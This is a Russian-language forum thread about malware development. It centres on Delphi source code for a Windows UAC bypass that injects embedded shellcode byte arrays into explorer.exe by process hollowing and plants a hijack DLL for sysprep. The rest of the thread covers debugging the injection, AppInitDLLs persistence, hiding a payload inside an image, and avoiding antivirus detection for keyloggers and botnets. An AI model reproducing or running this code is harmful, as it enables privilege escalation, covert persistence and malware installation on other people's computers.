$09, $44, $44, $50, $50, $A7, $4B, $32, $D8, $A1, $D7, $09, $48, $AD, $E6, $DE, $95, $48, $A6, $78, $0F, $85, $E5, $D9, $13, $45, $50, $DE, $FA, $85, $3B, $32, $6C, $56, $E8, $48, $03, $63, $8D, $74, $30, $EC, $6E, $DD, $BF, $AD, $59, $3B, $F0, $76, $26, $80, $3E, $5F, $4E, $09, $77, $F6, $0D, $18, $50, $6F, $8E, $D6, $3D, $41, $2B, $22, $2B, $2B, $DC, $B9, $88, $5C, $06, $6E, $97, $FF, $85, $01, $9B, $74, $6A, $3C, $5E, $56, $8D, $45, $A0, $53, $D0, $FA, $F5, $0F, $B7, $B9, $CD, $B0, $95, $04, $14, $BC,
$62, $05, $B8, $48, $E6, $4C, $CB, $B2, $05, $B0, $70, $B4, $38, $25, $D1, $67, $C3, $70, $E1, $75, $A0, $FD, $A4, $40, $88, $04, $AC, $E4, $12, $9A, $1F, $76, $31, $24, $5C, $39, $D8, $43, $F2, $00, $B9, $3A, $3A, $01, $D8, $65, $7B, $A1, $C0, $83, $4E, $6C, $3D, $89, $5E, $0C, $02, $08, $B3, $F1, $6D, $B5, $10, $65, $E3, $0C, $47, $D7, $B6, $40, $D7, $76, $60, $B8, $BB, $56, $18, $32, $40, $57, $7A, $23, $B0, $75, $83, $C5, $64, $5A, $14, $98, $B8, $8B, $AB, $5C, $32, $50, $85, $B5, $6F, $C8, $FB, $BF,
$02, $6F, $28, $90, $F3, $FE, $78, $11, $8B, $4C, $C9, $DD, $5D, $58, $F8, $3B, $41, $08, $7D, $9C, $49, $93, $04, $81, $AA, $07, $83, $38, $BD, $E7, $2A, $6D, $FF, $02, $FC, $96, $24, $20, $4B, $EE, $F6, $D7, $28, $20, $24, $1B, $8B, $51, $E7, $04, $82, $20, $47, $FF, $9B, $6B, $17, $B6, $31, $57, $FF, $A6, $B9, $F9, $4E, $FD, $90, $50, $CB, $BD, $8D, $A5, $83, $F1, $51, $C1, $00, $BC, $3A, $8E, $0D, $F6, $8D, $43, $C6, $E2, $6A, $20, $6A, $08, $9B, $D7, $B7, $5C, $FB, $AE, $D2, $50, $0C, $83, $66, $10,
$00, $CD, $09, $2D, $46, $14, $65, $EF, $70, $74, $06, $10, $13, $0A, $C1, $E0, $02, $50, $2A, $35, $68, $81, $8E, $21, $5F, $73, $5E, $6C, $D2, $EB, $3A, $07, $9C, $AF, $56, $BC, $08, $1F, $3D, $6D, $77, $0D, $5A, $95, $1E, $F0, $74, $06, $1B, $54, $D7, $AD, $6C, $B6, $45, $59, $2E, $26, $D2, $13, $C4, $F6, $5B, $77, $FB, $8B, $11, $85, $D2, $DC, $89, $42, $08, $89, $73, $01, $83, $C0, $08, $C3, $DF, $C2, $12, $DD, $1E, $83, $E8, $06, $10, $39, $09, $89, $0F, $B7, $6D, $07, $85, $15, $39, $83, $61, $71,
$EB, $0B, $48, $04, $57, $DA, $B6, $60, $10, $AE, $50, $0A, $51, $BD, $F2, $44, $1F, $04, $04, $67, $C5, $6A, $DD, $C1, $97, $8B, $08, $18, $61, $D8, $E3, $33, $0C, $C7, $6B, $FE, $CA, $07, $B9, $00, $09, $33, $10, $10, $A1, $08, $83, $CE, $BE, $DD, $3F, $8B, $0D, $21, $51, $9A, $A3, $EF, $B2, $D7, $0D, $BB, $5D, $C3, $CC, $00, $4F, $A1, $12, $27, $D8, $D8, $B7, $10, $D0, $15, $0C, $52, $62, $DC, $2F, $1B, $05, $BE, $5F, $83, $EC, $08, $A1, $6D, $03, $83, $87, $F8, $FC, $12, $FF, $63, $35, $10, $83, $E9,
$04, $39, $4D, $F8, $7C, $33, $3E, $F8, $81, $C2, $00, $40, $EF, $16, $FB, $0C, $99, $3F, $10, $82, $F6, $05, $50, $25, $C8, $96, $CC, $6C, $64, $51, $57, $8C, $1C, $7B, $83, $8F, $B1, $7E, $03, $E5, $FC, $CE, $0C, $03, $4D, $54, $2C, $0C, $BB, $6F, $0D, $5D, $8B, $0E, $E5, $5D, $D6, $19, $68, $64, $64, $6C, $C4, $05, $C8, $CC, $D0, $62, $82, $A2, $92, $98, $20, $04, $02, $28, $69, $B6, $22, $52, $40, $00, $49, $0A, $86, $20, $02, $C0, $04, $78, $B3, $CB, $BF, $6C, $D8, $30, $01, $48, $65, $61, $70, $43,
$72, $74, $65, $0B, $DB, $B6, $DF, $FE, $44, $65, $73, $74, $72, $6F, $79, $0C, $45, $78, $69, $74, $50, $09, $63, $0F, $73, $0C, $7D, $DB, $FE, $7F, $47, $65, $74, $4D, $6F, $64, $75, $6C, $65, $48, $61, $6E, $64, $05, $41, $11, $43, $6C, $6F, $73, $B5, $BF, $DC, $82, $0D, $2B, $49, $6E, $69, $61, $6C, $69, $7A, $65, $4A, $7D, $EC, $F6, $D6, $09, $63, $0A, $53, $65, $63, $07, $6F, $6E, $39, $43, $6F, $6D, $6D, $65, $DB, $EF, $DD, $28, $4C, $69, $6E, $38, $10, $75, $72, $71, $6E, $5D, $7E, $96, $AC, $FB,
$44, $75, $70, $6C, $34, $74, $4F, $90, $50, $69, $70, $65, $B6, $DF, $B0, $C7, $2F, $53, $74, $64, $19, $A2, $41, $6C, $7B, $63, $BE, $ED, $66, $C9, $24, $44, $58, $57, $61, $7A, $46, $6F, $72, $53, $DD, $9C, $7B, $DB, $66, $67, $29, $4F, $62, $6A, $81, $C5, $66, $65, $72, $6F, $65, $DB, $94, $94, $4C, $39, $76, $AA, $5B, $0B, $B1, $83, $B5, $46, $54, $65, $52, $65, $67, $2A, $85, $0D, $AE, $FD, $34, $C0, $6D, $65, $6D, $F2, $53, $20, $6E, $C3, $62, $5B, $EC, $63, $70, $79, $08, $69, $6E, $07, $0F, $DA,
$CD, $66, $73, $C5, $31, $90, $24, $31, $53, $68, $65, $43, $AC, $B5, $B6, $15, $48, $60, $75, $85, $06, $A3, $00, $FF, $BF, $F9, $7F, $10, $40, $20, $0D, $08, $10, $0E, $F0, $63, $0F, $06, $0A, $11, $0A, $18, $09, $0A, $05, $06, $0E, $13, $AB, $4F, $18, $0D, $FF, $FB, $FF, $FF, $BA, $44, $39, $2B, $32, $0F, $1E, $06, $0D, $33, $40, $0E, $34, $0A, $07, $07, $10, $32, $C5, $06, $15, $07, $2D, $06, $16, $76, $0A, $2B, $FD, $DB, $DF, $FE, $20, $06, $21, $06, $54, $06, $13, $2D, $0A, $09, $09, $07, $05, $13,
$03, $06, $07, $16, $0C, $17, $05, $0A, $F8, $76, $FB, $DB, $0C, $05, $12, $4E, $00, $50, $45, $60, $4C, $01, $07, $FA, $BF, $34, $53, $2C, $FF, $07, $23, $8A, $E0, $00, $0E, $21, $0B, $01, $02, $32, $00, $0C, $0A, $BE, $60, $83, $9D, $10, $03, $30, $0D, $0B, $02, $A4, $9B, $05, $D9, $1E, $04, $07, $0C, $70, $64, $CB, $0E, $BB, $03, $38, $10, $07, $4A, $B3, $6F, $F9, $BA, $47, $46, $2A, $40, $50, $14, $50, $17, $48, $C1, $32, $65, $02, $60, $C8, $23, $0F, $64, $DD, $55, $C0, $57, $6C, $1F, $2E, $63, $6F,
$C2, $DE, $61, $CD, $64, $65, $B0, $90, $02, $B7, $7D, $93, $DD, $85, $E6, $20, $2E, $88, $78, $74, $10, $4A, $08, $85, $03, $D8, $08, $0F, $06, $27, $72, $64, $C9, $46, $36, $79, $B6, $61, $4F, $56, $30, $D0, $B1, $C9, $EE, $ED, $92, $40, $2E, $26, $10, $14, $03, $73, $58, $63, $9B, $B2, $12, $27, $C0, $4F, $73, $1B, $42, $23, $80, $0C, $76, $50, $4F, $16, $7F, $32, $C8, $37, $46, $74, $C8, $27, $60, $18, $F7, $75, $7C, $53, $42, $1B, $2C, $50, $7B, $7C, $D8, $04, $00, $00, $00, $00, $00, $40, $02, $00,
$FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $80, $7C, $24, $08, $01, $0F, $85, $86, $01, $00, $00, $60, $BE, $15, $80, $00, $10, $8D, $BE, $EB, $8F, $FF, $FF, $57, $EB, $10, $90, $90, $90, $90, $90, $90, $8A, $06, $46, $88, $07, $47, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $72, $ED, $B8, $01, $00, $00, $00, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C0, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $31, $C9, $83, $E8, $03, $72, $0D,
$C1, $E0, $08, $8A, $06, $46, $83, $F0, $FF, $74, $74, $89, $C5, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $75, $20, $41, $01, $DB, $75, $07, $8B, $1E, $83, $EE, $FC, $11, $DB, $11, $C9, $01, $DB, $73, $EF, $75, $09, $8B, $1E, $83, $EE, $FC, $11, $DB, $73, $E4, $83, $C1, $02, $81, $FD, $00, $F3, $FF, $FF, $83, $D1, $01, $8D, $14, $2F, $83, $FD, $FC, $76, $0F, $8A, $02, $42, $88, $07, $47, $49, $75, $F7, $E9, $63, $FF,
$FF, $FF, $90, $8B, $02, $83, $C2, $04, $89, $07, $83, $C7, $04, $83, $E9, $04, $77, $F1, $01, $CF, $E9, $4C, $FF, $FF, $FF, $5E, $8D, $BE, $00, $60, $00, $00, $8B, $07, $09, $C0, $74, $3C, $8B, $5F, $04, $8D, $84, $30, $00, $80, $00, $00, $01, $F3, $50, $83, $C7, $08, $FF, $96, $50, $80, $00, $00, $95, $8A, $07, $47, $08, $C0, $74, $DC, $89, $F9, $57, $48, $F2, $AE, $55, $FF, $96, $54, $80, $00, $00, $09, $C0, $74, $07, $89, $03, $83, $C3, $04, $EB, $E1, $61, $31, $C0, $C2, $0C, $00, $83, $C7, $04, $8D,
$5E, $FC, $31, $C0, $8A, $07, $47, $09, $C0, $74, $22, $3C, $EF, $77, $11, $01, $C3, $8B, $03, $86, $C4, $C1, $C0, $10, $86, $C4, $01, $F0, $89, $03, $EB, $E2, $24, $0F, $C1, $E0, $10, $66, $8B, $07, $83, $C7, $02, $EB, $E2, $8B, $AE, $58, $80, $00, $00, $8D, $BE, $00, $F0, $FF, $FF, $BB, $00, $10, $00, $00, $50, $54, $6A, $04, $53, $57, $FF, $D5, $8D, $87, $9F, $01, $00, $00, $80, $20, $7F, $80, $60, $28, $7F, $58, $50, $54, $50, $53, $57, $FF, $D5, $58, $61, $8D, $44, $24, $80, $6A, $00, $39, $C4, $75,
$FA, $83, $EC, $80, $E9, $0A, $86, $FF, $FF, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $78, $90, $00, $00, $50, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $85, $90, $00, $00, $68, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $90, $90, $00, $00, $70, $90, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $9C, $90, $00,
$00, $AA, $90, $00, $00, $BA, $90, $00, $00, $CA, $90, $00, $00, $D8, $90, $00, $00, $00, $00, $00, $00, $E6, $90, $00, $00, $00, $00, $00, $00, $EE, $90, $00, $00, $00, $00, $00, $00, $4B, $45, $52, $4E, $45, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $4D, $53, $56, $43, $52, $54, $2E, $64, $6C, $6C, $00, $53, $48, $45, $4C, $4C, $33, $32, $2E, $44, $4C, $4C, $00, $00, $00, $4C, $6F, $61, $64, $4C, $69, $62, $72, $61, $72, $79, $41, $00, $00, $47, $65, $74, $50, $72, $6F, $63, $41, $64, $64, $72, $65, $73,
$73, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $50, $72, $6F, $74, $65, $63, $74, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $41, $6C, $6C, $6F, $63, $00, $00, $56, $69, $72, $74, $75, $61, $6C, $46, $72, $65, $65, $00, $00, $00, $6D, $65, $6D, $73, $65, $74, $00, $00, $53, $68, $65, $6C, $6C, $45, $78, $65, $63, $75, $74, $65, $45, $78, $41, $00, $00, $00, $00, $00, $FA, $BF, $34, $53, $00, $00, $00, $00, $32, $91, $00, $00, $01, $00, $00, $00, $01, $00, $00, $00, $01, $00, $00, $00, $28, $91, $00,
$00, $2C, $91, $00, $00, $30, $91, $00, $00, $77, $10, $00, $00, $3B, $91, $00, $00, $00, $00, $54, $65, $73, $74, $2E, $64, $6C, $6C, $00, $4D, $79, $46, $75, $6E, $63, $74, $69, $6F, $6E, $00, $00, $00, $00, $80, $00, $00, $0C, $00, $00, $00, $6D, $38, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00);
const
LogEnable = 1;
function NtUnmapViewOfSection(ProcessHandle: DWORD; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll';
type
PImageBaseRelocation = ^TImageBaseRelocation;
TImageBaseRelocation = packed record
VirtualAddress: DWORD;
SizeOfBlock: DWORD;
end;
procedure PerformBaseRelocation(f_module: Pointer; INH: PImageNtHeaders; f_delta: Cardinal); stdcall;
var
l_i: Cardinal;
l_codebase: Pointer;
l_relocation: PImageBaseRelocation;
l_dest: Pointer;
l_relInfo: ^Word;
l_patchAddrHL: ^DWord;
l_type, l_offset: integer;
begin
l_codebase := f_module;
if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
begin
l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
while l_relocation.VirtualAddress > 0 do
begin
l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
l_relInfo := Pointer(Cardinal(l_relocation) + 8);
for l_i := 0 to (trunc(((l_relocation.SizeOfBlock - 8) / 2)) - 1) do
begin
l_type := (l_relInfo^ shr 12);
l_offset := l_relInfo^ and $FFF;
if l_type = 3 then
begin
l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
end;
inc(l_relInfo);
end;
l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
end;
end;
end;
function LogFileAdd(Line: string): integer;
var
F: TextFile;
FileName: string;
today: TDateTime;
begin
if LogEnable = 1 then
begin
FileName := ('D:\system.log');
AssignFile(F, FileName);
if FileExists(FileName) then
Append(F)
else
Rewrite(F);
today := Now;
WriteLn(F, TimeToStr(today), ' ', Line);
CloseFile(F);
// Writeln(TimeToStr(today), ' ', Line);
Result := 1;
end;
end;
function AlignImage(pImage: Pointer): Pointer;
var
IDH: PImageDosHeader;
INH: PImageNtHeaders;
ISH: PImageSectionHeader;
i: WORD;
begin
IDH := pImage;
INH := Pointer(Integer(pImage) + IDH^._lfanew);
GetMem(Result, INH^.OptionalHeader.SizeOfImage);
ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
begin
ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
end;
end;
function Get4ByteAlignedContext(var Base: PContext): PContext;
begin
Base := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
Result := Base;
if Base <> nil then
while ((DWORD(Result) mod 4) <> 0) do
Result := Pointer(DWORD(Result) + 1);
end;
function ExecuteFromMem(szFilePath, szParams: string; pFile: Pointer): DWORD;
var
PI: TProcessInformation;
SI: TStartupInfo;
CT: PContext;
CTBase: PContext;
IDH: PImageDosHeader;
INH: PImageNtHeaders;
dwImageBase: DWORD;
pModule: Pointer;
dwNull: SIZE_T;
begin
if szParams <> '' then
szParams := '"' + szFilePath + '" ' + szParams;
Result := 0;
IDH := pFile;
if IDH^.e_magic = IMAGE_DOS_SIGNATURE then
begin
INH := Pointer(Integer(pFile) + IDH^._lfanew);
if INH^.Signature = IMAGE_NT_SIGNATURE then
begin
FillChar(SI, SizeOf(TStartupInfo), #0);
FillChar(PI, SizeOf(TProcessInformation), #0);
SI.cb := SizeOf(TStartupInfo);
if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
begin
CT := Get4ByteAlignedContext(CTBase);
if CT <> nil then
begin
CT.ContextFlags := CONTEXT_FULL;
if GetThreadContext(PI.hThread, CT^) then
begin
ReadProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @dwImageBase, 4, dwNull);
if dwImageBase = INH^.OptionalHeader.ImageBase then
begin
if NtUnmapViewOfSection(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)) = 0 then
pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
else
pModule := VirtualAllocEx(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
end
else
pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if pModule <> nil then
begin
pFile := AlignImage(pFile);
if DWORD(pModule) <> INH^.OptionalHeader.ImageBase then
begin
PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
INH^.OptionalHeader.ImageBase := DWORD(pModule);
CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
end;
WriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwNull);
WriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwNull);
CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, CT^);
ResumeThread(PI.hThread);
Result := PI.hThread;
end;
end;
VirtualFree(CTBase, 0, MEM_RELEASE);
end;
if Result = 0 then
TerminateProcess(PI.hProcess, 0);
end;
end;
end;
end;
function mFileToStr(Ruta: ansistring): ansistring;
var
sFile: HFile;
uBytes: Cardinal;
begin
Result := '';
sFile := _lopen(PansiChar(Ruta), OF_READ);
uBytes := GetFileSize(sFile, nil);
SetLength(Result, uBytes);
_lread(sFile, @Result[1], uBytes);
_lclose(sFile);
end;
procedure mWriteFileFromStr(Cadena, Ruta: ansistring);
var
sFile: HFile;
uBytes: Cardinal;
begin
sFile := _lcreat(PansiChar(Ruta), 0);
uBytes := Length(Cadena);
_lwrite(sFile, @Cadena[1], uBytes);
_lclose(sFile);
end;
function IsUserAnAdmin: integer; external 'shell32';
function Bypass: bool;
var
Yo: ansistring;
DllD: ansistring;
psinfo: pshellexecuteinfow;
tmpdir: array[0..MAX_PATH] of char;
windir: array[0..MAX_PATH] of char;
sysdir: array[0..MAX_PATH] of char;
tmp: string;
sys: string;
win: string;
sysprp: string;
InjectCount, InjectStatus: integer;
begin
InjectStatus := 0;
InjectCount := 10;
Result := False;
GetTempPath(MAX_PATH, tmpdir);
GetSystemDirectory(sysdir, MAX_PATH);
GetWindowsDirectory(windir, MAX_PATH);
win := windir + '\explorer.exe';
sys := sysdir + '\sysprep\cryptbase.dll';
sysprp := sysdir + '\sysprep\sysprep.exe';
tmp := tmpdir + 'cryptbase.dll';
if isuseranadmin = 1 then
begin
Result := True;
while fileexists(sys) do
deletefile(sys);
deletefile(tmp);
end
else
begin
if ansiuppercase(ExtractFileName(paramstr(0))) <> 'EXPLORER.EXE' then
begin
Yo := mfiletostr(paramstr(0));
SetLength(DllD, SizeOf(DllDummy));
CopyMemory(@DllD[1], @DllDummy[0], SizeOf(DllDummy));
mWriteFileFromStr(DllD, tmp);
while InjectCount > 0 do
begin
// Инжектирование
InjectStatus := ExecuteFromMem(win, paramstr(0), @FOp[0]);
if InjectStatus = 0 then
begin
InjectCount := InjectCount - 1;
sleep(100); // Защитная задержка цикла инжекции (Иначе ЦП будет перегружен)
LogFileAdd('Ошибка инжекции FOp, блок памяти занят ! повтор...');
end
else
begin
InjectCount := 0;
LogFileAdd('Инжекция FOp выполнена успешно PI.hThread:' + IntToStr(InjectStatus));
end;
end;
while InjectCount > 0 do
begin
// Инжектирование
InjectStatus := ExecuteFromMem(win, paramstr(0), @Yo[1]);
if InjectStatus = 0 then
begin
InjectCount := InjectCount - 1;
sleep(100); // Защитная задержка цикла инжекции (Иначе ЦП будет перегружен)
LogFileAdd('Ошибка инжекции Yo, блок памяти занят ! повтор...');
end
else
begin
InjectCount := 0;
LogFileAdd('Инжекция Yo выполнена успешно PI.hThread:' + IntToStr(InjectStatus));
end;
end;
exitprocess(0);
end
else
begin
New(psInfo);
psinfo.cbSize := sizeof(shellexecuteinfo);
psinfo.fMask := SEE_MASK_INVOKEIDLIST;
psinfo.lpVerb := 'open';
PSINFO.lpFile := PWideChar(sysprp);
psinfo.lpParameters := PWideChar(paramstr(1));
psinfo.nShow := SW_SHOWNORMAL;
shellexecuteexw(psinfo);
exitprocess(0);
end;
end;
end;
begin
if (Bypass) then
begin
LogFileAdd('Soy admin')
end
else
begin
LogFileAdd('No admin');
end;
end.Получаю:
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
19:42:07 Ошибка инжекции FOp, блок памяти занят ! повтор...
Я так понимаю не инжектится певая константа (FOp: array) откуда информация о наборе байт FOp, и просвятите если не сложно как вы эти байты составили ? В ручную больно муторно. (Это если не затруднит)
И еще инжект параметра paramstr(0) это в самого себя, имеет ли это смысл ?
Нужна возможность записи в ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppinitDlls, может быть есть более изящные методы без инжекта в довереный процесс ?
Последнее редактирование:
- Регистрация
- 01.03.2016
- Сообщения
- 114
- Репутация
прочитал и усвоил спасибо а скажите пожалуйста как сделать чтоб картинка не вылазила и по возможности впихнуть это (добро) в картинку и чтоб по тихому все было как-то через видео все понятнее
ps. код переделывать не умею
ps. код переделывать не умею
прочитал и усвоил спасибо а скажите пожалуйста как сделать чтоб картинка не вылазила и по возможности впихнуть это (добро) в картинку и чтоб по тихому все было как-то через видео все понятнее
ps. код переделывать не умею
Ты откуда сорвался ? Какая картинка ?
X-Shar - было бы не плохо разобраться что за набор байтов в FOp. Мне админские права как бы и не нужны, все и без них пашет, вопрос только в получении прав на запись в реестр AppInitDLL
- Регистрация
- 03.06.2012
- Сообщения
- 6 202
- Репутация
FOp и DllDummy это не просто блоки памяти, это основная программа, реализующее уязвимость, которую кстати уже профиксили в винде...
Что-бы просмотреть что-там такое, вам нужно либо дизасеблировать код, либо в ольке посмотреть что-там, тем самым и отладите программу !
Делфи в данном случае выполняет-лишь роль загрузки и исполнения этого кода !
Что-то больше не скажу ибо нужно разбираться, когда я этим занимался, все работало вроде...
Вообще обходить уак смысла нет, по следующим причинам:
1. Спокойно можно работать под уаком дя 90% решения всех задач;
2. Уак нетак просто обойти сейчас, а обход череват возникновением ненужных багов и доп. детекта.
Что-бы просмотреть что-там такое, вам нужно либо дизасеблировать код, либо в ольке посмотреть что-там, тем самым и отладите программу !
Делфи в данном случае выполняет-лишь роль загрузки и исполнения этого кода !
Что-то больше не скажу ибо нужно разбираться, когда я этим занимался, все работало вроде...
Вообще это автозагрузка-же, делайте из под уак, не помню как ветка называется, но из под уака можно писать в ветку автозагрузки пользователя...
Вообще обходить уак смысла нет, по следующим причинам:
1. Спокойно можно работать под уаком дя 90% решения всех задач;
2. Уак нетак просто обойти сейчас, а обход череват возникновением ненужных багов и доп. детекта.
Можно писать в автозагрузку с правами пользователя, но в этом случае программа так же будет стартовать с правами пользователя и это дюже палевно, X-Shar может есть нечто о котором я не знаю ? Ключей у меня нет чтобы подписаться на довереный участок.
Мне бы понять как этот ассемблерный код составляется, от чего они отталкиваются чтобы начать сие деяние, поняв смысл масштабов партии ЦК можно делать не школьные вещи.
Олю знаю в совершенстве, но даже это не дает мне каких либо средств для манипуляции, это какой то конкретный баг в конкретной версии windows ? Который уже давно пропатчили.
Мне бы понять как этот ассемблерный код составляется, от чего они отталкиваются чтобы начать сие деяние, поняв смысл масштабов партии ЦК можно делать не школьные вещи.
Олю знаю в совершенстве, но даже это не дает мне каких либо средств для манипуляции, это какой то конкретный баг в конкретной версии windows ? Который уже давно пропатчили.
- Регистрация
- 03.06.2012
- Сообщения
- 6 202
- Репутация
А в чем палевность, повышение привелегий - Это повод аверам "задуматься" не вирус-ли это...
А так из-под пользователя всё можно делать, нормально работает и кейлоггер и адварь, ботнеты...
Если всё верно помню, это баг 2014 года, причём для 7-ки, по крайне мере я несмог заюзать для 8-ки...
Вот вкратце как это работает:
Сама программа обхода в данном случае написана на асме и откомпилирована, далее берутся эти откомпилированные байты, в данном случаи массивы байт FOp и DllDummy...
Далее что-бы повысить себе права, запускаются эти программы в своей проге, смысл в том-что в данном случае не нужно знать асм, или тех. тонкости уязвимости, а достаточно только уметь запустить этот так-называемы шелл-код ! :)
Данный-же шелл код, по мойму ещё и для x32, а вообще попробуйте ещё этот исходник:Вопрос - Обход UAC (Bypass UAC)
Он по свежее, может поможет чем !
